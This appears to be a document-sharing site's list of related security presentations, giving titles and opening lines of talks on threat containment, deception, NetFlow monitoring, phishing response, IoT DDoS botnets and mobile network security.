Threat Containment and Operations Yong Kwang Kek, Director of Presales SE, APJ 2018-07-19 1 1 2017 Infoblox Inc. All Rights 2013 Infoblox Inc. All Reserved. Rights Reserved. Three Aspects of Security #1
More informationDeception: Deceiving the Attackers Step by Step
Deception: Deceiving the Attackers Step by Step TrapX Security, Inc. February, 2018 In 2017, Gartner emphasized how companies are transforming their security spending strategy and moving away from prevention-only
More informationMonitoring and Threat Detection
Monitoring and Threat Detection with Netflow Michael Belan Consulting Systems Engineer Cisco GSSO January 2017 AGENDA What is SW? Where does it fit in overall Cisco Security framework? What is SW? What
More informationOne Phish, Two Phish, Three! Building an Active Threat Management Framework for Malicious
One Phish, Two Phish, Three! Building an Active Threat Management Framework for Malicious Email - Ron Weiss, Incident Response Team lead Disclaimer: The information in this presentation is based on lessons
More informationTrends in IoT DDoSbotnets
Trends in IoT DDoSbotnets Netnod Meeting, 14-15 March2018 Steinthor Bjarnason ASERT Network Security Research Engineer sbjarnason@arbor.net 2018 ARBOR PUBLIC 7,7 MillionDuring this presentation, approx.
More informationFP7 NEMESYS Project: Advances on Mobile Network Security
Enhanced Network Security for Seamless Service Provisioning in the Smart Mobile Ecosystem FP7 NEMESYS Project: Advances on Mobile Network Security Elina Theodoropoulou R&D Projects Section Manager etheodorop@cosmote.gr
More information